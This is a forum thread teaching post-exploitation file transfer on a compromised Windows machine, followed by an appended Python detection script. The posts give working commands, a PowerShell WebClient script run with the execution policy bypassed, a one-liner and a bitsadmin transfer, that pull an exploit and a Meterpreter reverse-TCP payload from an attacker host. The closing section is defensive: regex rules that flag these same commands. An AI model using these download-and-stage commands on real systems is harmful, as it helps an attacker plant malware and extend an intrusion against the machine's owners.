Thread: Post Exploitation - wget using windows powershell and bitsadmin on target machine

  1. #1

    Post Exploitation - wget using windows powershell and bitsadmin on target machine

    Assumptions:
    1) You got access to a Windows system which supports PowerShell and bitsadmin.
    Please note that bitsadmin is no longer supported on Windows; instead of bitsadmin we can use PowerShell.

    Execute the following commands in the target machine's limited shell:

    Code:
    echo $storageDir = $pwd > wget.ps1
    echo $webclient = New-Object System.Net.WebClient >>wget.ps1
    echo $url = "http://192.168.0.1/winExp.exe" >>wget.ps1
    echo $file = "winExp.exe" >>wget.ps1
    echo $webclient.DownloadFile($url, $file) >>wget.ps1

    Now our wget.ps1 is ready for action, i.e. it should help the attacker transfer the exploit to the target Windows machine.

    You can cross-verify wget.ps1 using the TYPE command.

    Now let's download the file using the PowerShell command given below.

    Code:
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
    In some other cases, some of the lower versions of Windows don't support PowerShell. In this case you can use the bitsadmin utility to download the file into the target machine's directory.

    Code:
    bitsadmin /transfer myDownloadJob http://192.168.0.1/winExp.exe c:\Users\g4h\Desktop1.exe
    Last edited by [s]; 06-29-2016 at 04:05 PM.
    Garage4Hackers bugs for the community , of the community


  2. #2

    There is another one-liner file downloader in PowerShell:

    Code:
    $storageDir = $pwd; $webclient = New-Object System.Net.WebClient; $url = "http://192.168.0.1/met_revtcp_38_443.exe"; $file = "met.exe"; $webclient.DownloadFile($url,$file)
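
From the defender's side, the three transfer methods in this thread leave recognizable command-line and script-block text. The following is an added example, not part of either post: it assumes the input strings come from process-creation or PowerShell script-block logging, and the rule names and sample events are constructed for illustration.

```python
import re

# Hypothetical rule names. A rule fires only if ALL its patterns match.
RULES = {
    # powershell.exe started with the execution policy bypassed and a .ps1 file
    "powershell_bypass_file": [
        r"\bpowershell(\.exe)?\b",
        r"-(ep|exec|executionpolicy)\s+bypass\b",
        r"-f(ile)?\s+\S+\.ps1\b",
    ],
    # System.Net.WebClient writing a remote resource to disk
    "webclient_downloadfile": [
        r"\bNet\.WebClient\b",
        r"\.DownloadFile\s*\(",
    ],
    # bitsadmin transfer job whose source is an HTTP(S) URL
    "bitsadmin_transfer": [
        r"\bbitsadmin(\.exe)?\b",
        r"/transfer\b",
        r"https?://",
    ],
}
URL_RE = re.compile(r"https?://[^\s\"')]+", re.I)

def classify(text):
    """Return (matched rule names, URLs) for one command line or script block."""
    hits = sorted(
        name for name, patterns in RULES.items()
        if all(re.search(p, text, re.I) for p in patterns)
    )
    return hits, (URL_RE.findall(text) if hits else [])

# Constructed sample events: the thread's commands plus two benign lines.
SAMPLE_EVENTS = [
    "powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1",
    r"bitsadmin /transfer myDownloadJob http://192.168.0.1/winExp.exe c:\Users\g4h\Desktop1.exe",
    '$webclient = New-Object System.Net.WebClient; $url = "http://192.168.0.1/winExp.exe"; '
    '$webclient.DownloadFile($url, "winExp.exe")',
    "powershell.exe -NoProfile -File backup.ps1",
    "bitsadmin /list /allusers",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        hits, urls = classify(event)
        print("ALERT" if hits else "ok   ", hits, urls, "|", event[:60])
```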
